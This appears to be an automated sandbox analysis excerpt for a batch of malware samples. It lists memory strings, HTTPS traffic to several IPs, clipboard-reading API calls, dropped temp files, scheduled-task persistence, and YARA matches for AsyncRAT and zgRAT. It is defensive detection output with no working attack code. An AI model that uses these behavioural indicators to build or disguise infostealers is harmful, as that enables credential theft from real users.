Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: RegAsm.exe, 00000009.00000002.2875623535.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000029F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003095000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003174000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002953000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: stories.exe, 00000014.00000003.2826954081.0000000002230000.00000004.00001000.00020000.00000000.sdmp, stories.exe, 00000014.00000003.2827256040.0000000002008000.00000004.00001000.00020000.00000000.sdmp, stories.tmp, 00000015.00000000.2828637379.0000000000401000.00000020.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: stories.exe, 00000014.00000002.3332146749.0000000000401000.00000020.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: stories.exe, 00000014.00000002.3332146749.0000000000401000.00000020.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: stealc_default2.exe, 00000013.00000002.3061112605.0000000068E3D000.00000002.00000001.01000000.00000021.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: stories.exe, 00000014.00000003.2826954081.0000000002230000.00000004.00001000.00020000.00000000.sdmp, stories.exe, 00000014.00000003.2827256040.0000000002008000.00000004.00001000.00020000.00000000.sdmp, stories.tmp, 00000015.00000000.2828637379.0000000000401000.00000020.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: stories.exe, 00000014.00000003.2826954081.0000000002230000.00000004.00001000.00020000.00000000.sdmp, stories.exe, 00000014.00000003.2827256040.0000000002008000.00000004.00001000.00020000.00000000.sdmp, stories.tmp, 00000015.00000000.2828637379.0000000000401000.00000020.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.remobjects.com/psU
Source: stealc_default2.exe, 00000013.00000002.3028700532.000000001AFFC000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.3060182683.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.x-ways.net/order
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.x-ways.net/order.html-d.htmlS
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.x-ways.net/winhex/license
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.x-ways.net/winhex/license-d-f.htmlS
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.x-ways.net/winhex/subscribe
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.x-ways.net/winhex/subscribe-d.htmlU
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: penis.exe, 00000018.00000002.2884267791.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.s
Source: penis.exe, 00000018.00000002.2884267791.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, crypted.exe, 0000001B.00000002.2955093646.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000001A.00000003.2874602060.0000019DEABA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000001A.00000003.2874602060.0000019DEAB30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tesseract-ocr/tessdata/
Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ssl.com/repository0
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.html
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.htmlf
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.x-ways.net/winhex/forum/
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443

Source: unknown	HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.5:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.13:443 -> 192.168.2.5:49786 version: TLS 1.2

Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe

Code function: 14_2_00EE9000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

14_2_00EE9000

Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe

Code function: 14_2_00EE9000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

14_2_00EE9000

Source: penis.exe, 00000018.00000002.2884267791.000000000315A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_580c3019-f

Source: Yara match	File source: 32.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: needmoney.exe PID: 6616, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp21D7.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\TmpD145.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File created: C:\Users\user\AppData\Local\Temp\TmpE088.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\TmpD156.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp21C7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp3223.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File created: C:\Users\user\AppData\Local\Temp\TmpE0A8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp3213.tmp	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 37.2.InstallUtil.exe.800000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 24.0.penis.exe.ca0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 36.2.rstxdhuj.exe.4141590.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 36.2.rstxdhuj.exe.418fdb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000025.00000002.3332091327.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000024.00000002.3009810672.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen

.NET source code contains very large array initializations

Source: gold[1].exe.6.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296
Source: gold.exe.6.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: 2a8f2f9086.exe.6.dr	Static PE information: section name:
Source: 2a8f2f9086.exe.6.dr	Static PE information: section name: .idata
Source: 2a8f2f9086.exe.6.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001AC9F7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,		16_2_001AC9F7
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_0022C9F7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,		17_2_0022C9F7

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File created: C:\Windows\Tasks\Hkbsse.job
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_015ADC74	9_2_015ADC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_05876948	9_2_05876948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_05877C20	9_2_05877C20
